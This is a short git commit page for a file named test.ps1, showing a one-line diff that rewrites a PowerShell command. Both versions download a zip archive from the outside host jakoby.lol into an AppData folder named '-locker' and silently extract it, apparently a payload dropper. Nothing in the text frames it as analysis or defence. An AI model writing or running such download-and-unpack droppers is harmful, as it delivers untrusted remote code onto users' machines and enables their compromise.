Update test.ps1
This commit is contained in:
parent
a5e4b0df2a
commit
96d3b82c3b
1 changed files with 1 additions and 1 deletions
|
@ -1 +1 @@
|
||||||
$D="$env:appdata\-locker";iwr -Uri "jakoby.lol/qee" -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D -Force
|
iwr -Uri "jakoby.lol/qee" -O "$env:appdata\-locker\rr.zip";Expand-Archive "$env:appdata\-locker\rr.zip" -Des $env:appdata\-locker -Force
|
||||||
|
|
Loading…
Reference in a new issue